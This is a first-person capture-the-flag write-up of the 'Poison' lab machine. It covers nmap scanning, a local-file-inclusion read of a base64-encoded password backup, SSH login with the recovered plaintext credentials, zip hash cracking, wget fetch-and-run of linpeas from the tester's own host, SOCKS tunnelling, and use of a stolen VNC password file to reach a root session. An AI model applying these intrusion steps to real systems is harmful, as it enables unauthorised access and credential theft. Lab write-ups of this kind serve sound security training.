Poison

Personal Rating: Easy

The initial access was incredibly easy, but the privilege escalation required some tools and concepts that I was not well versed in, which made it difficult for me to spot.

Initial Enumeration

sudo nmap -sV -sC <IP>

22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Theres a webpage at http://10.10.10.84/

LFI Exploit

The scriptname field allow to read local files, which raises LFI suspicions :)

And indeed:

We got the user charix and its FreeBSD.

Password Extraction

If you open the php files shown in the info text one by one, the listfiles.php stands out:

Opening the pwdbackup.txt shows something interesting:

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

base64-decoding the string 13 times using cyberchef results in this:

Charix!2#4%6&8(0

ssh-ing to the box with charix:Charix!2#4%6&8(0 worked.

Internal Enumeration

I should exfiltrate the zip file.

Typing ‘python’ and pressing tab I found out that python2 was installed on the host, so I used a Python webserver to exfiltrate the file via wget:

python -m SimpleHTTPServer 8000

It is password protected:

Using zip2john I could extract the password:

[nix@local] $ zip2john /HTBfolder/Boxes/HTB-Poison/secret.zip
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827
secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::/HTBfolder/Boxes/HTB-Poison/secret.zip

Putting the hash in a file and attempting to crack it with john did not work

john --wordlist=/usr/share/seclists/Passwords/rockyou.txt hash.tmp

Wow Okay, the password Charix!2#4%6&8(0 worked to open the zip.

The content of the secret file is odd:

[|Ֆz!

Internal Enumeration 2

I established a dynamic reverse proxy connection to the host with ssh:

ssh -D 9050 charix@10.10.10.84

This does not seem to work.

charix@Poison:~ % cat /etc/ssh/sshd_config | grep TcpForwarding

#AllowTcpForwarding yes
# AllowTcpForwarding no

TcpForwarding is not explicitly prohibited, but it might be a firewall issue

This does only show 22 and 9050, which is odd:

proxychains ss -tulpn

uname -a reveals this: FreeBSD Poison 11.1-RELEASE

With a first internet search it does not seem like there is a big vulnerability for that os version.

ps -aux | grep root shows this, which could be interesting:

root 529 0.0 0.7 23620 7468 v0- I 17:37 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/
root 540 0.0 0.5 67220 4676 v0- I 17:37 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 703 0.0 0.2 10484 1608 v7 Is+ 17:39 0:00.00 /usr/libexec/getty Pc ttyv7
root 564 0.0 0.3 19660 2868 0 Is+ 17:37 0:00.01 -csh (csh)

I hosted linpeas on my machine and fetched and used it like this:

charix@Poison:~ % wget 
http://10.10.16.6:8000/linpeas.sh

charix@Poison:~ % chmod +x linpeas.sh
./linpeas.sh
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: first RE may not be empty
/tmp/.X11-unix/X1
└─(Read Write)
/var/run/devd.pipe
└─(Read Write)
/var/run/devd.seqpacket.pipe
└─(Read Write)
/var/run/log
└─(Read Write)
-r-sr-xr-x 1 root wheel 2.1M Jan 2 2018 /usr/local/bin/Xorg (Unknown SUID binary!)
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/lesspipe.sh
/usr/local/bin/gettext.sh
<SNIP>

I also ran LinEnum. But I did not see more than with linpeas.

Webserver deeper enum:

Since I could not find anything interesting locally, I went back to the webserver and checked the php info file. Maybe it runs as root or something along those lines.

http://10.10.10.84/browse.php?file=phpinfo.php

webroot: /usr/local/www/apache24/data
charix@Poison:/usr/local/www/apache24/data % ls
browse.php index.php info.php ini.php listfiles.php phpinfo.php pwdbackup.txt

I could not identify any obvious vulnerability in the php configuration.

One instance of httpd seems to run as root (ps -aux)

root 632 0.0 1.1 99172 11516 - Ss 17:50 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT

I read that the initial access should have usually been a log poisoning. You should have gotten the www-data user with poisoning the apache log with a php executable user agent and then calling the log. From what I saw, this was not necessary. Since I made no progress here, I peaked in a walkthrough to get a hint. It was that the VNC session that I saw earlier could be connected to with a VNC viewer. So I was on the right track with the X Session I found and also the port forwarding I did was a good idea. I just have to connect to the session somehow.

Starting RealVNC Viewer with proxychains and calling 127.0.0.1 did not work.

I googled how to find listening ports on BSD:

https://www.cyberciti.biz/faq/freebsd-unix-find-the-process-pid-listening-on-a-certain-port-commands/

sockstat -l

USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 1144 3 tcp6 *:80 *:*
www httpd 1144 4 tcp4 *:80 *:*
root sendmail 650 3 tcp4 127.0.0.1:25 *:*
www httpd 648 3 tcp6 *:80 *:*
www httpd 648 4 tcp4 *:80 *:*
www httpd 647 3 tcp6 *:80 *:*
www httpd 647 4 tcp4 *:80 *:*
www httpd 646 3 tcp6 *:80 *:*
www httpd 646 4 tcp4 *:80 *:*
www httpd 645 3 tcp6 *:80 *:*
www httpd 645 4 tcp4 *:80 *:*
www httpd 644 3 tcp6 *:80 *:*
www httpd 644 4 tcp4 *:80 *:*
root httpd 632 3 tcp6 *:80 *:*
root httpd 632 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe

Okay, I will try connecting again, using the ports 5901 and 5801.

It works, but it asks for a password. The strings I collected so far did not work.

The string from the file looks very weird and didnt work. I downloaded tigervnc, which is a CLI vnc viewer. It can use a file as password input:

proxychains vncviewer passwd=/HTBfolder/Boxes/HTB-Poison/secret 127.0.0.1:5901

This worked to connect to the VNC session!